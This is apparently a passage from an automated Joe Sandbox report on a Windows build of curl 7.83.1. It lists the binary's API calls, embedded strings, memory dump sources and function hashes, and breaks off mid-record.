                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
                                        • API String ID: 0-499900516
                                        • Opcode ID: 941bd267f684d5333cc5a4d1562a396d614d4740f9234d9dfbf26cd6d32cb47f
                                        • Instruction ID: e66fd054a91d1e63259796fe34c58aec37115c05dc7419df7f46a8f2e8d44f1c
                                        • Opcode Fuzzy Hash: 941bd267f684d5333cc5a4d1562a396d614d4740f9234d9dfbf26cd6d32cb47f
                                        • Instruction Fuzzy Hash: 6DC13A70A0111D9FEB24DB28C982FBE77E5AF45304F18407BEA09DB642DB746C41ABD2
                                        APIs
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 000C15E1
                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C15F9
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 000C1692
                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?), ref: 000C16A0
                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 000C16AC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C1780
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,00000001,?,?,%.*s:,00000000,?), ref: 000C18A3
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000001,?), ref: 000C18B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fwrite$fflush$fputcfree
                                        • String ID: %.*s:$Content-disposition:$etag:$filename=
                                        • API String ID: 697768202-2097661518
                                        • Opcode ID: 46f16777fed1cd486835cfa0fef0d30e13f592fa2c0e7f2a9b907d707d22469e
                                        • Instruction ID: 9e251eef52513faff952944144c4f217e057fc2f4557f36622bae42dd99e7ba5
                                        • Opcode Fuzzy Hash: 46f16777fed1cd486835cfa0fef0d30e13f592fa2c0e7f2a9b907d707d22469e
                                        • Instruction Fuzzy Hash: 7CA1C035A04705EBDB25CF64C880FEEBBF2AF42344F18856DE8A657253D730A981DB90
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E41E7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E41FD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E422D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4265
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4291
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E42D5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4311
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E43B3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4420
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4432
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: NO_PROXY$Uses proxy env variable %s == '%s'$memory shortage$no_proxy
                                        • API String ID: 1294909896-1311824155
                                        • Opcode ID: a89c96c1900e9d2b0b5fcfc46fc9c7e7a344c35b7b74036aa9f89eab6c874ba0
                                        • Instruction ID: 03735eb7ab1f4bf6f64552adb496dc93ca2121396b84e9973260fc3d73169e4d
                                        • Opcode Fuzzy Hash: a89c96c1900e9d2b0b5fcfc46fc9c7e7a344c35b7b74036aa9f89eab6c874ba0
                                        • Instruction Fuzzy Hash: 2EA1CE30A04696EFDF589F75D8487AEBBE6FF44310F24806EE418A3251DB74AD50CB91
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C9DCF
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C9E7A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9F01
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9F0F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9F5B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000C9F70
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9F9B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9FAA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9FC5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9FD9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdup
                                        • String ID: out of memory$k%
                                        • API String ID: 2653869212-351869995
                                        • Opcode ID: d4bc3b6eb9f78318b4ef9431b001a6dc5030cc0c4f219359ef38df18d8ec0478
                                        • Instruction ID: a6972de48ee5fcf824037d6c1dca998faf26baabfd0482e8c2df1e7e09d2b881
                                        • Opcode Fuzzy Hash: d4bc3b6eb9f78318b4ef9431b001a6dc5030cc0c4f219359ef38df18d8ec0478
                                        • Instruction Fuzzy Hash: F1812531A01646CFDB58CFA4C888FADBBF2BF54311F28417EE8099F655DB70A8818B54
                                        APIs
                                          • Part of subcall function 000D20F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,000C8A7A,curl 7.83.1 (Windows) %s,00000000), ref: 000D2101
                                        • puts.API-MS-WIN-CRT-STDIO-L1-1-0(001174AB), ref: 000C8AC7
                                        • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,00000000,00000004,Function_00008A20), ref: 000C8B1A
                                        • puts.API-MS-WIN-CRT-STDIO-L1-1-0(001174AB), ref: 000C8B43
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: puts$__acrt_iob_funcqsort
                                        • String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
                                        • API String ID: 619265888-3826092985
                                        • Opcode ID: c7a0dcc0372ef03d58fb5c54e94b2a8acf19f17dc21291e880afdc7ac52fa567
                                        • Instruction ID: 51c98bbd6c096fac8f3c1cc2f9412f05ec2e39ca43b87b77ab05f35ad325c3b7
                                        • Opcode Fuzzy Hash: c7a0dcc0372ef03d58fb5c54e94b2a8acf19f17dc21291e880afdc7ac52fa567
                                        • Instruction Fuzzy Hash: 2D31E470344300ABC728AF68E846DED3FA5FF48B10764413EF41197683DFB1988297AA
                                        APIs
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
                                        • __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
                                        • __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
                                        • _strrchr.LIBCMT ref: 000DA142
                                        • _strrchr.LIBCMT ref: 000DA15C
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$_strrchr$__sys_errlist__sys_nerrstrncpy
                                        • String ID: Unknown error %d (%#x)
                                        • API String ID: 3225659327-2414550090
                                        • Opcode ID: d1a0669c28c47b2dff1d0bcba0b76cd425710c4b57e4ab27bc20a0e7200624e3
                                        • Instruction ID: bca3265a6e963a35fca6c3a2ced2a81e85a46688eaba6418bc1afcf7fb7773f6
                                        • Opcode Fuzzy Hash: d1a0669c28c47b2dff1d0bcba0b76cd425710c4b57e4ab27bc20a0e7200624e3
                                        • Instruction Fuzzy Hash: 47212835300B11EBC71917B89C097AE7AEA9FD7391F10402BF102D77A2DBB4884086B6
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C35E5
                                        • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000080,00000007,00000000,00000003,00000000,00000000), ref: 000C35FD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C360D
                                        • GetFileTime.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,?), ref: 000C3621
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C3666
                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000C3688
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C3690
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C369B
                                        Strings
                                        • Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 000C36A2
                                        • Failed to get filetime: underflow, xrefs: 000C3646
                                        • Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 000C3679
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorFileLast$CloseCreateHandleTimeUnothrow_t@std@@@__ehfuncinfo$??2@_strdupfree
                                        • String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
                                        • API String ID: 862977939-2112902429
                                        • Opcode ID: 2ba0c95d697235a9247c5e2e4bcad23fb2b4b0c68e17ecdccdb4c6a0c49b0bfc
                                        • Instruction ID: 4f186120f72e4d0ae0ac04476b9bbd1ed91ba9d1aed3eb1aac08b16a2c4e3d6e
                                        • Opcode Fuzzy Hash: 2ba0c95d697235a9247c5e2e4bcad23fb2b4b0c68e17ecdccdb4c6a0c49b0bfc
                                        • Instruction Fuzzy Hash: F921C571A14600BBD7196BB49D4EFFE7BA9EB85704F14C12DF502E62C1EB709E404625
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E473C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4755
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4772
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E479C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4874
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E48C3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E48D7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E48F3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E495C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s%s.netrc$%s%s_netrc$Couldn't find host %s in the %s file; using defaults$HOME
                                        • API String ID: 1294909896-3314400472
                                        • Opcode ID: a3762b430ff8d6e9f88746810ccbbb490cc28054d4e8c51ddcfba58382103769
                                        • Instruction ID: a96ace1989ef94a5ac09a670f69f438cc7a18a68f9a88e010771a72f8813c832
                                        • Opcode Fuzzy Hash: a3762b430ff8d6e9f88746810ccbbb490cc28054d4e8c51ddcfba58382103769
                                        • Instruction Fuzzy Hash: 79A18D35A0461AEFCB189F65EC44AAEB7F5FF48310F14806BE851B3251EB70AD51CBA1
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E346D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E34FF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E35A5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E35E8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E3637
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 000E381E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$strtoul
                                        • String ID: %s://%s$Switched from HTTP to HTTPS due to HSTS => %s$file$http$https
                                        • API String ID: 961130014-588811053
                                        • Opcode ID: eded5ba8aa16cfadcad29d7c20ce4955ef55999e4a1356105081060bb5da2263
                                        • Instruction ID: b8ca0dd2aa03f85a76760ba321bdf822b177d2bfa0ced9933d539f664f4f489c
                                        • Opcode Fuzzy Hash: eded5ba8aa16cfadcad29d7c20ce4955ef55999e4a1356105081060bb5da2263
                                        • Instruction Fuzzy Hash: 16E12371704B42AFEB2C9B35DC44BE9BBE6AF44310F14812BE855A73C1DF70AA448B90
                                        APIs
                                        • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 000F80F9
                                        • sendto.WS2_32(?,?,?,00000000,?,?), ref: 000F8193
                                        • WSAGetLastError.WS2_32(?,?,00000004,?,00000000), ref: 000F81A2
                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000004,?,00000000), ref: 000F81D1
                                        Strings
                                        • tftp_tx: giving up waiting for block %d ack, xrefs: 000F816A
                                        • Timeout waiting for block %d ACK. Retries = %d, xrefs: 000F804D
                                        • tftp_tx: internal error, event: %i, xrefs: 000F8028
                                        • Received ACK for block %d, expecting %d, xrefs: 000F8149
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: sendto$ErrorLast_time64
                                        • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                        • API String ID: 3931062552-2715966420
                                        • Opcode ID: 4fb7314cdc15a7ed16aa6fbd020ff2e32d8f465e4ba7c5b4566b41fcf8d47db0
                                        • Instruction ID: 0d7f5d1a64fc97cfe9ab8788ab7b52be18244b9d1353aad72ed2c092181326b8
                                        • Opcode Fuzzy Hash: 4fb7314cdc15a7ed16aa6fbd020ff2e32d8f465e4ba7c5b4566b41fcf8d47db0
                                        • Instruction Fuzzy Hash: 04919D71204B049FD7758F38C885BFAB7E5FB59300F04892EE99AC2661DB30B945EB60
                                        APIs
                                        • send.WS2_32(?,?,00000006,00000000), ref: 000FF340
                                        • WSAGetLastError.WS2_32 ref: 000FF34A
                                        • send.WS2_32(?,?,?,00000000), ref: 000FF3E5
                                        • WSAGetLastError.WS2_32 ref: 000FF3EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastsend
                                        • String ID: %127[^,]%1[,]%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s$%c%s%c%s$Sending data failed (%d)
                                        • API String ID: 1802528911-3533120981
                                        • Opcode ID: 97d50616ee2b478b7fc0fa14667de47fa3c23a3d8a9261ead9c0d9da1905b670
                                        • Instruction ID: e2b9420a6aa7339193cb53b90b7293985ed3becc14a6a2b72b4d476bbacd087b
                                        • Opcode Fuzzy Hash: 97d50616ee2b478b7fc0fa14667de47fa3c23a3d8a9261ead9c0d9da1905b670
                                        • Instruction Fuzzy Hash: 8A81E771A44219AFEB60CB14CC45FFA77A8AF44700F0441F5F649EB683DA71AB84DBA0
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000F1902
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000F1913
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,?,000EA14F,?), ref: 000F1AC8
                                          • Part of subcall function 000DD126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD13A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrfree
                                        • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:
                                        • API String ID: 653773606-2985882615
                                        • Opcode ID: 4d9b0cc107250f7e20405bf7eb2ebd288f75d2dfd1d2bdcdf0e86d45dd685e55
                                        • Instruction ID: 256333e0cff31f853820bcaea49054b64f7b84fcb1a0e4c698873c146ce9f76a
                                        • Opcode Fuzzy Hash: 4d9b0cc107250f7e20405bf7eb2ebd288f75d2dfd1d2bdcdf0e86d45dd685e55
                                        • Instruction Fuzzy Hash: 7271F030F0471ADBDF68CE64E4A07FDB7E1AF44350F24402AD644ABA85DB709D42EB91
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000001,00000000,00000000), ref: 000C2E50
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000002), ref: 000C2E67
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000103,00000001,00000000,00000000), ref: 000C2EB2
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C2FA9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: strncpy$_strdupmalloc
                                        • String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN
                                        • API String ID: 3833483438-925842913
                                        • Opcode ID: 1804b859a09d201c39f170653ddb98495dbc909a9903e58d041355ab798e60a5
                                        • Instruction ID: b7220a1e563bbec8eda27b4fc123265b665cc5d9972a7efa63b2280a8120cfa4
                                        • Opcode Fuzzy Hash: 1804b859a09d201c39f170653ddb98495dbc909a9903e58d041355ab798e60a5
                                        • Instruction Fuzzy Hash: 88619D3120460646DF798B348860FFE77E99FA6744F24807DE8829BA82DB748FC68750
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D4F5C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4FD2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4FE4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4FF6
                                        • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00122984,00000000,00000000,?), ref: 000D5039
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D5055
                                        • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,00122984,00000000,00000000,?), ref: 000D5082
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D509A
                                        • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(000D5B45,00122984,00000000,00000000,?), ref: 000D50C3
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D50DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr$freestrcspn
                                        • String ID:
                                        • API String ID: 2030676775-3916222277
                                        • Opcode ID: 8ae176edc626406f82f19ffc79d15caacb3c4f99c29e358932bc09e0059c384e
                                        • Instruction ID: 023b16ec6890793a418b008ad96e7007d1d7f0ceca80bbb132fdb63bbf57ee4c
                                        • Opcode Fuzzy Hash: 8ae176edc626406f82f19ffc79d15caacb3c4f99c29e358932bc09e0059c384e
                                        • Instruction Fuzzy Hash: 7B51C131904719EFDB288F54E8857EEBBF5EF08354F20806FE841A7381DB7199458BA4
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1CC2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1D16
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1D81
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000F1DAF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1DD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$___from_strstr_to_strchr
                                        • String ID: Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$P
                                        • API String ID: 622630536-3255330290
                                        • Opcode ID: 3355ff839ac93e217661dbcaf82122303229609540b15249d6e6f307ae447239
                                        • Instruction ID: 5b85414db1f92ea8420e3d71d9f7df2f12641bed461e8aa5e6bd525e2f7c8b09
